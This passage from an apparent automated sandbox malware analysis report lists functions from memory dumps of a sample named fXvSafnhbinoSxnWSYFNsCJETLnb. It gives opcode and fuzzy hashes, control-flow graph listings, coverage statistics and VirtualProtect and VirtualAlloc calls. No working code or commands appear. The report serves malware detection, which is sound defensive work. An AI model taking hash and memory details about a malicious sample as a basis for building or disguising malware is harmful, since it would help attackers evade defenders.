                                        • Instruction Fuzzy Hash: 11014C30909A8D8FCB45EF28C8A9A997FF0FF69301F0541AAE448C71A1D734D954CB81
                                        Function 00007FFD9BAB0C50 Relevance: .0, Instructions: 44COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 00e976e2d76f7d73cc7e319f5b7f1ddef6af360781fa574bbfa98d37d1af9b49
                                        • Instruction ID: 19c3df8c767fc3a5b01076fe75a7979a17b95bbae3b909663ab8398ff13c1c64
                                        • Opcode Fuzzy Hash: 00e976e2d76f7d73cc7e319f5b7f1ddef6af360781fa574bbfa98d37d1af9b49
                                        • Instruction Fuzzy Hash: B301F970A0E29E8FE722ABA4C8242E97B70EF07310F0542B3D065DB1E3CB785614CB85
                                        Function 00007FFD9BC72F59 Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1767502944.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bc70000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7cd15fffdc530bfcbe0cd7aa3cab5b1e63fac0d8f533f19be6f3257313ee4479
                                        • Instruction ID: ef33752d7cddde41adbec7cb35accb830414fa3a05aacf352bdefdf6a31b9e98
                                        • Opcode Fuzzy Hash: 7cd15fffdc530bfcbe0cd7aa3cab5b1e63fac0d8f533f19be6f3257313ee4479
                                        • Instruction Fuzzy Hash: C8018F3090968C8FCB45DF64C894AD97FB0FF59300F0501AAD408C71A1CB359995CB80
                                        Function 00007FFD9BC71B39 Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1767502944.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bc70000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e79d233a75ced01e911407337d93057c398ff0e615cbaf96d928a7181a3942a4
                                        • Instruction ID: 9729419744e2aea9586c90dbd95a42746f0735f454b2e6ed5036030793381e81
                                        • Opcode Fuzzy Hash: e79d233a75ced01e911407337d93057c398ff0e615cbaf96d928a7181a3942a4
                                        • Instruction Fuzzy Hash: CF018F3090868C8FCB85EF68C8A8AA97FB0FF29301F0540DBD448C71A2D7349994CB80
                                        Function 00007FFD9BAB0B9D Relevance: .0, Instructions: 40COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2beb56fcdfae7de04f9c0b719414eb87a91d442f2512e6ea8deffa91b69a2f8d
                                        • Instruction ID: 68512273498fd0e6472cb16a5a99d0c5f153eb145ed2acf5845017a79f155abc
                                        • Opcode Fuzzy Hash: 2beb56fcdfae7de04f9c0b719414eb87a91d442f2512e6ea8deffa91b69a2f8d
                                        • Instruction Fuzzy Hash: 3601A430A2864DCFDB84EF58C885AA97BE0FB58314F154565E85DD3254D730E960CB81
                                        Function 00007FFD9BAB06A5 Relevance: .0, Instructions: 35COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 100a4df91e84942ad351d9653140638ecab949c848c09544ca698cb1f753fbbe
                                        • Instruction ID: c2cddb36c453699d795c51c7ac93a3622abff7a6efde449f50b77d963f459537
                                        • Opcode Fuzzy Hash: 100a4df91e84942ad351d9653140638ecab949c848c09544ca698cb1f753fbbe
                                        • Instruction Fuzzy Hash: A8F03030A0561E9FEB60EF99D4596FE77A0FF54300F110436E41CC21A0DA74A690CB84
                                        Function 00007FFD9BAB1300 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cde9f0e7d32f3c50f3b426655184bebd6554bb8e04d382b4fd8626c46bbd37f2
                                        • Instruction ID: ecaf3db6e92d3b6517a548b9362baf0238879299a42c35afbcfd4a87a84482b2
                                        • Opcode Fuzzy Hash: cde9f0e7d32f3c50f3b426655184bebd6554bb8e04d382b4fd8626c46bbd37f2
                                        • Instruction Fuzzy Hash: 92F0BD74A1494DDFDF94EF58C449AAA7BE0FF68304F014466F818C3260D630E594CB80
                                        Function 00007FFD9BAB06C8 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9547e6e923fac0699592f2518b4ea5e80e26951fbd0eed22d200345d2e97913e
                                        • Instruction ID: fc1514eaa603810483ea6bbc1a113ef380b1a0f8404c506795c8e4e6b868ae42
                                        • Opcode Fuzzy Hash: 9547e6e923fac0699592f2518b4ea5e80e26951fbd0eed22d200345d2e97913e
                                        • Instruction Fuzzy Hash: 76F0FE3091564D9FDB90EFA484596FA77E0FF14304F014466A81DD21A0DA74A6A0CB80
                                        Function 00007FFD9BAB1685 Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f5c2cc354d45b67f99989ab3ea66726f674e37a83f90da756077893ef59647af
                                        • Instruction ID: 44102c0401881d6b0d13b881ba813cc6af45c3e014e809bcd6dddd21098756c4
                                        • Opcode Fuzzy Hash: f5c2cc354d45b67f99989ab3ea66726f674e37a83f90da756077893ef59647af
                                        • Instruction Fuzzy Hash: F5F01535A1964D9BDB20FFA8D9116EAB7A0EF41300F00457AE468C3191EA74A7288B81
                                        Function 00007FFD9BAB0CCF Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5eb9a9934ddd80f2e7818e5c91a7ea71f4f8c36175920f1bb2a6f9fcd7d0eefb
                                        • Instruction ID: bf79b422833ff31347eae0daed1eebe103ad4f481431ba1bf9fdb45178d0f999
                                        • Opcode Fuzzy Hash: 5eb9a9934ddd80f2e7818e5c91a7ea71f4f8c36175920f1bb2a6f9fcd7d0eefb
                                        • Instruction Fuzzy Hash: 62F06870A0955A8BE764DB94C4546FD73B0BF55710F04067AD029922D2CBB46640CF45
                                        Function 00007FFD9BAB70E6 Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12154962f538307c62c8618ab973b97109c95256c6768d8a6942da9d524f7a2b
                                        • Instruction ID: aaf101be2f3ed2dd57927cd51885274b4410d7b4edf407fd4cad41683a17da01
                                        • Opcode Fuzzy Hash: 12154962f538307c62c8618ab973b97109c95256c6768d8a6942da9d524f7a2b
                                        • Instruction Fuzzy Hash: EDF0D470A0A52A8AFB749B94C8543ADB7B0EF95300F2050BDD15EA33D2DE785B85CF49
                                        Function 00007FFD9BAB6B59 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2fcc2211460f1ccee4671a81e67b68ccec056382855f4271d8c1f443f4417e48
                                        • Instruction ID: 025495de2ef62c2b6b52e765d8e55e13895c0dafb233555c0797803ba5fefd68
                                        • Opcode Fuzzy Hash: 2fcc2211460f1ccee4671a81e67b68ccec056382855f4271d8c1f443f4417e48
                                        • Instruction Fuzzy Hash: 44E08C31E2866C89EBA8DB20C854AECB3B1EF54300F4045FB800EB2094CEB41A818F00

                                        Non-executed Functions

                                        Function 00007FFD9BAB09B0 Relevance: 5.2, Strings: 4, Instructions: 180COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: c9$!k9$"s9$#{9
                                        • API String ID: 0-1692736845
                                        • Opcode ID: bd7d849093680327cbde912dee0b0aa862b9edba8ff449d95fa61d7c45cc43c2
                                        • Instruction ID: 7d178ec8f5d423defeff0d21c16cc78616b767b7e79ff915253d8d5543a29955
                                        • Opcode Fuzzy Hash: bd7d849093680327cbde912dee0b0aa862b9edba8ff449d95fa61d7c45cc43c2
                                        • Instruction Fuzzy Hash: 33419D17B0953645E339B3FD78219E9AB848FA827FB0847BBF56E8D0C74C486081C2D9

                                        Execution Graph

                                        Execution Coverage:3%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:7
                                        Total number of Limit Nodes:1
                                        execution_graph 32864 7ffd9bac215e 32865 7ffd9bac216d VirtualProtect 32864->32865 32867 7ffd9bac22ad 32865->32867 32868 7ffd9bac3b4d 32869 7ffd9bac3b23 32868->32869 32870 7ffd9bac3b6b VirtualAlloc 32868->32870 32872 7ffd9bac3c85 32870->32872

                                        Executed Functions

                                        Function 00007FFD9BACBD2D Relevance: 1.8, Instructions: 1809COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 21 7ffd9bacbd2d-7ffd9bacbd68 22 7ffd9bacbd6a 21->22 23 7ffd9bacbd6f-7ffd9bacbdcf 21->23 22->23 27 7ffd9bacbdd1 23->27 28 7ffd9bacbddd-7ffd9bacbdec 23->28 27->28 29 7ffd9bacbdf3-7ffd9bacbdfc 28->29 30 7ffd9bacbdee 28->30 31 7ffd9bacbe29-7ffd9bacbe84 29->31 32 7ffd9bacbdfe-7ffd9bacbe0d 29->32 30->29 42 7ffd9bacbe8b-7ffd9bacbf14 31->42 43 7ffd9bacbe86 31->43 33 7ffd9bacbe14-7ffd9bacd795 call 7ffd9bace9b6 32->33 34 7ffd9bacbe0f 32->34 41 7ffd9bacd7a0-7ffd9bacd7b2 33->41 34->33 51 7ffd9bacbf7b-7ffd9bacc124 42->51 52 7ffd9bacbf16-7ffd9bacbf79 42->52 43->42 72 7ffd9bacce0e-7ffd9bacce1b 51->72 52->51 73 7ffd9bacc129-7ffd9bacc137 72->73 74 7ffd9bacce21-7ffd9bacce63 72->74 75 7ffd9bacc139 73->75 76 7ffd9bacc13e-7ffd9bacc292 73->76 82 7ffd9baccf20-7ffd9baccf26 74->82 75->76 122 7ffd9bacc294-7ffd9bacc2d9 76->122 123 7ffd9bacc2df-7ffd9bacc392 76->123 85 7ffd9baccf2c-7ffd9baccf6e 82->85 86 7ffd9bacce68-7ffd9baccec5 82->86 96 7ffd9bacd1bc-7ffd9bacd1c2 85->96 97 7ffd9baccec7-7ffd9baccecb 86->97 98 7ffd9baccef2-7ffd9baccf1d 86->98 101 7ffd9bacd1c8-7ffd9bacd221 96->101 102 7ffd9baccf73-7ffd9baccfb6 96->102 97->98 100 7ffd9baccecd-7ffd9bacceef 97->100 98->82 100->98 109 7ffd9bacd227-7ffd9bacd273 101->109 110 7ffd9bacd2b0-7ffd9bacd2be 101->110 116 7ffd9baccfb8-7ffd9bacd00c 102->116 117 7ffd9bacd00d-7ffd9bacd0bb 102->117 109->110 118 7ffd9bacd2c5-7ffd9bacd307 110->118 116->117 156 7ffd9bacd0c1-7ffd9bacd14b 117->156 157 7ffd9bacd14d-7ffd9bacd151 117->157 135 7ffd9bacd767-7ffd9bacd76d 118->135 122->123 160 7ffd9bacc3a1-7ffd9bacc3ac 123->160 161 7ffd9bacc394-7ffd9bacc39c 123->161 138 7ffd9bacd30c-7ffd9bacd3aa 135->138 139 7ffd9bacd773-7ffd9bacd79f call 7ffd9bace9b6 135->139 168 7ffd9bacd3da-7ffd9bacd3e9 138->168 169 7ffd9bacd3ac-7ffd9bacd3b7 138->169 139->41 175 7ffd9bacd19b-7ffd9bacd1b9 156->175 158 7ffd9bacd187-7ffd9bacd19a 157->158 159 7ffd9bacd153-7ffd9bacd185 157->159 158->175 159->175 171 7ffd9bacc40e-7ffd9bacc44f 160->171 172 7ffd9bacc3ae-7ffd9bacc40b 160->172 163 7ffd9baccdf9-7ffd9bacce0b 161->163 163->72 173 7ffd9bacd3eb 168->173 174 7ffd9bacd3f0-7ffd9bacd3ff 168->174 181 7ffd9bacd3b9-7ffd9bacd3cf 169->181 182 7ffd9bacd40a-7ffd9bacd40f 169->182 195 7ffd9bacc451-7ffd9bacc459 171->195 196 7ffd9bacc45e-7ffd9bacc50c 171->196 172->171 173->174 178 7ffd9bacd401-7ffd9bacd408 174->178 179 7ffd9bacd414-7ffd9bacd42f 174->179 175->96 178->182 186 7ffd9bacd431-7ffd9bacd44b 179->186 187 7ffd9bacd44f-7ffd9bacd73b 179->187 181->168 185 7ffd9bacd746-7ffd9bacd764 182->185 185->135 186->187 187->185 195->163 209 7ffd9bacc51b-7ffd9bacc5c9 196->209 210 7ffd9bacc50e-7ffd9bacc516 196->210 218 7ffd9bacc5cb-7ffd9bacc5d3 209->218 219 7ffd9bacc5d8-7ffd9bacc686 209->219 210->163 218->163 227 7ffd9bacc695-7ffd9bacc743 219->227 228 7ffd9bacc688-7ffd9bacc690 219->228 236 7ffd9bacc745-7ffd9bacc74d 227->236 237 7ffd9bacc752-7ffd9bacc800 227->237 228->163 236->163 245 7ffd9bacc802-7ffd9bacc80a 237->245 246 7ffd9bacc80f-7ffd9bacc81a 237->246 245->163 248 7ffd9bacc81c-7ffd9bacc877 246->248 249 7ffd9bacc878 246->249 248->249 250 7ffd9bacc879-7ffd9bacc8bd 248->250 249->250 256 7ffd9bacc8cc-7ffd9bacc97a 250->256 257 7ffd9bacc8bf-7ffd9bacc8c7 250->257 265 7ffd9bacc989-7ffd9bacca37 256->265 266 7ffd9bacc97c-7ffd9bacc984 256->266 257->163 274 7ffd9bacca39-7ffd9bacca41 265->274 275 7ffd9bacca46-7ffd9baccaf4 265->275 266->163 274->163 283 7ffd9baccaf6-7ffd9baccafe 275->283 284 7ffd9baccb03-7ffd9baccb0e 275->284 283->163 286 7ffd9baccb69-7ffd9baccbb1 284->286 287 7ffd9baccb10-7ffd9baccb65 284->287 294 7ffd9baccbb3-7ffd9baccbbb 286->294 295 7ffd9baccbc0-7ffd9baccc6e 286->295 287->286 294->163 303 7ffd9baccc7d-7ffd9baccd2b 295->303 304 7ffd9baccc70-7ffd9baccc78 295->304 312 7ffd9baccd3a-7ffd9baccde8 303->312 313 7ffd9baccd2d-7ffd9baccd35 303->313 304->163 321 7ffd9baccdea-7ffd9baccdf2 312->321 322 7ffd9baccdf4-7ffd9baccdf6 312->322 313->163 321->163 322->163
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BACB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bacb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e63fc913554a8849f9a6463dc4f49ff6fcec8ed1639f69ee91730e9e1fde9ff5
                                        • Instruction ID: b0da7dbe9fb26de5bd6b851cf6f1fa12433babecc03081c3ae7a1fd379a425f6
                                        • Opcode Fuzzy Hash: e63fc913554a8849f9a6463dc4f49ff6fcec8ed1639f69ee91730e9e1fde9ff5
                                        • Instruction Fuzzy Hash: D6F21B71E0995D8FDBA9EB58C8A5BB8B7B1FF58310F0442E9D00DD7292DA746A81CF40
                                        Function 00007FFD9BB1CB41 Relevance: .4, Instructions: 436COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BB0F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB0F000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bb0f000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3605977be582591de4dd0d3b10be664e97c4ac86aaccaa8c102a1acaf8ca4e13
                                        • Instruction ID: 955d40aafee5aaa4a0c35a1f4a8367fbe0052fb8489e6da84e1b54ce04a466ae
                                        • Opcode Fuzzy Hash: 3605977be582591de4dd0d3b10be664e97c4ac86aaccaa8c102a1acaf8ca4e13
                                        • Instruction Fuzzy Hash: 36F11D71A19A5D8FDBA4DF58C8A5BE8B7E1FF58301F4141EAD40DE3291DB346A80CB41
                                        Function 00007FFD9BAFA4C7 Relevance: .4, Instructions: 406COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fee9bb2e10c816502366fe04754a3d08a7e01c3da76f9f3d457adb3da0890555
                                        • Instruction ID: d53b07d532095a62a4e3cb1ae60b65faec873c7b96d7ca600ae99ad9549e6c13
                                        • Opcode Fuzzy Hash: fee9bb2e10c816502366fe04754a3d08a7e01c3da76f9f3d457adb3da0890555
                                        • Instruction Fuzzy Hash: 31020770E0421D8FDB58DFA8C4A19ECFBB1FF48304F148569D41AAB25ADB34A985CF54
                                        Function 00007FFD9BAB0D70 Relevance: .3, Instructions: 267COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 21d0e652a67437e83b36e0a73a834d837b4b79f7fcfb588c8ed2eaf6ce29e399
                                        • Instruction ID: 3dfc5fff7528570ea71c6633dbac954712d76494e18d86f88c646cf998dc5127
                                        • Opcode Fuzzy Hash: 21d0e652a67437e83b36e0a73a834d837b4b79f7fcfb588c8ed2eaf6ce29e399
                                        • Instruction Fuzzy Hash: 7D910175A08A9D8FE798CB68C8657A97FE2FF49314F0002BED019D72D6DB781815CB40
                                        Function 00007FFD9BB031B5 Relevance: 2.6, Strings: 2, Instructions: 105COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,$4
                                        • API String ID: 0-508195717
                                        • Opcode ID: 819823cb5ef91e4c20937e39d7a88210e4c5aebe99caac4368f39adc766cfb1f
                                        • Instruction ID: 037b31b06acc366825c99acf32106457caba3305c0ba534a1fe42ea7cd221565
                                        • Opcode Fuzzy Hash: 819823cb5ef91e4c20937e39d7a88210e4c5aebe99caac4368f39adc766cfb1f
                                        • Instruction Fuzzy Hash: 74412A70A0994DCFDB68DB94C8A4AA9B7B1FF58305F1141AAC04A972E5DB35AA85CF00
                                        Function 00007FFD9BB03EC0 Relevance: 1.7, Strings: 1, Instructions: 488COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: U
                                        • API String ID: 0-3372436214
                                        • Opcode ID: b2cbdd95b67d686f71c3384c2dda32312eeb1ed2621fe8ccc2b45e5fdcde1121
                                        • Instruction ID: d8a915a96501f9f1817d0f07348039f59637938ff93e73e9ae724b0657a77176
                                        • Opcode Fuzzy Hash: b2cbdd95b67d686f71c3384c2dda32312eeb1ed2621fe8ccc2b45e5fdcde1121
                                        • Instruction Fuzzy Hash: DAD1FA32B1AD4E4FDBA8DB5C98A4AB573D1FF98354B0502BAD44DC72DADE24ED418340
                                        Function 00007FFD9BAC215E Relevance: 1.7, APIs: 1, Instructions: 190memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 398 7ffd9bac215e-7ffd9bac216b 399 7ffd9bac2176-7ffd9bac2187 398->399 400 7ffd9bac216d-7ffd9bac2175 398->400 401 7ffd9bac2189-7ffd9bac2191 399->401 402 7ffd9bac2192-7ffd9bac22ab VirtualProtect 399->402 400->399 401->402 406 7ffd9bac22ad 402->406 407 7ffd9bac22b3-7ffd9bac2303 402->407 406->407
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9babb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: ca32737f32c91f9c81c773497c232064b861d0d99ff59c4f3903aa9d56fa0aad
                                        • Instruction ID: 8c2e05ee72fe3965e5269d14b0a09a495a0201150d3fcebb8ffedbbbfcc4bcaf
                                        • Opcode Fuzzy Hash: ca32737f32c91f9c81c773497c232064b861d0d99ff59c4f3903aa9d56fa0aad
                                        • Instruction Fuzzy Hash: D4516D30D0874D8FDB54DFA8C845AEDBBF1FB6A310F1042AAD049E7255DB74A885CB81
                                        Function 00007FFD9BAC3B4D Relevance: 1.5, APIs: 1, Instructions: 209memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 410 7ffd9bac3b4d-7ffd9bac3b69 411 7ffd9bac3b6b-7ffd9bac3c83 VirtualAlloc 410->411 412 7ffd9bac3b23-7ffd9bac3b4a 410->412 418 7ffd9bac3c85 411->418 419 7ffd9bac3c8b-7ffd9bac3cef 411->419 418->419
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9babb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: de46814169c0d1de82c447c05b2402bae1b778f6021761f83ddc11bd0e24112b
                                        • Instruction ID: 41277c795239166d6de7c874eab3a7e7acb837bd9bf8348737cbedbe6da44ab4
                                        • Opcode Fuzzy Hash: de46814169c0d1de82c447c05b2402bae1b778f6021761f83ddc11bd0e24112b
                                        • Instruction Fuzzy Hash: 99515D7090965C8FDF94EFA8D845BE9BBF1FB69310F0041AAD04DE3252DB74A9858B40
                                        Function 00007FFD9BB0DD61 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: U
                                        • API String ID: 0-3372436214
                                        • Opcode ID: e7cab90bea1677cde3f1fc5e15722c721cde1232d4742779da2722243afe5812
                                        • Instruction ID: 08aacc0f3bf57bd2bc6043e16e650d9adbfc6097df0b22f84e08ff07eb87e77d
                                        • Opcode Fuzzy Hash: e7cab90bea1677cde3f1fc5e15722c721cde1232d4742779da2722243afe5812
                                        • Instruction Fuzzy Hash: 59515A31B1DA8E0FEF99DB6884655B977E1FF54358B0006FAE45CCB1EBDE24A9018340
                                        Function 00007FFD9BB0D0A1 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: L
                                        • API String ID: 0-2909332022
                                        • Opcode ID: 646621ef9a15fc6164ddbb65af5d0714d18bbfebf01e69586a7c83db2303b06a
                                        • Instruction ID: f303d5126854746d486eb6b16a23025c8806513afaabf00a3b71dfb418dd75be
                                        • Opcode Fuzzy Hash: 646621ef9a15fc6164ddbb65af5d0714d18bbfebf01e69586a7c83db2303b06a
                                        • Instruction Fuzzy Hash: 8A413770E1961D8FEBA4DB58C8A5BA8B7B1FB48304F1042A9D44ED22A5DF346982CB41
                                        Function 00007FFD9BB0DCBD Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A
                                        • API String ID: 0-3554254475
